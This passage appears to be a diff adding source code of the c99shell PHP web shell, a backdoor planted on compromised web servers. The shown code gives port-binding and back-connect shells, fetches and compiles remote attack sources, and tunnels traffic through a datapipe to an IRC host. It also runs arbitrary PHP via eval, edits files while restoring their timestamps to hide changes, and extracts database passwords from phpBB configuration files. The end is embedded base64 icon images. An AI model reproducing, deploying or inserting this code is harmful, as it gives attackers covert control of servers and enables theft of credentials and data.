echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } + } + ?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,true)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 